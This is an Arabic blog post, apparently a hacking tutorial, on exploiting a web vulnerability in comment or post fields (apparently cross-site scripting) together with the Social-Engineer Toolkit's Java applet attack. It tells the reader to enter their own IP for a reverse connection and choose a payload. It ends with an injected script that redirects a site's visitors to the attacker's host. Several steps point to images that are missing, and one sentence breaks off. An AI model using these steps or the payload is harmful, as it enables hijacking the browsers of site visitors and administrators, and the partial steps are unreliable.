تعتبر ثغرات من اخطر الثغرات الامنية في مجال الاختراق لما تمكن المخترق من القيام بعدة تحكمات واختراقات تخصص اجهزة متصفحة الموقع المصاب وقد يكون المسؤؤل عن الموقع احد هذه الضحايا .في هذه التدوينة سوف نتطرق الى كيفية استغلالها بشكل احترافي واستعمال اداة SETالشهيرة لضمان نجاح استغلال هذا النوع من الثغرات الامنية
كما نعرف ان هذا النوع من الثغرات يمكن ان تجده في تطبيقات الويب من خلال متلا زر التعليق او اضافة موضوع او غيرها
كما في الصورة التالية
بعد تجريب اذا كانت الثغرة موجودة سواء يدويا او من خلال اداة اختبار اختراق ننتقل الى كيفية استخدام اداةSET لاستغلال هذا النوع
بطريقة احترافية
بعد تشغيل الاداة والولوج الى لوحة الخيارات المتنوعة كل ما علينا فعله هو
بعد اختبار هذا النوع من الهجوم والذي يستهدف مكون الجافا الموجود في المستعرض لدى المستخدمين نفوم بوضع الايبي الخاص بنا لعمل اتصال عكسي وكذلك استخدام تصميم محدد للعرض
الخطوة الاكثر اهمية هي اختيار البايلود المناسب كما هو موضح في الصورة التالية
بعدها لاتمام الاستغلال كما تريد بالفعل عليك بالذهاب الى مكان اكتشاف الثغرة الامنية وتطبيق البايلود الخاص بذلك
<script>window.location="http://yourip"</script>
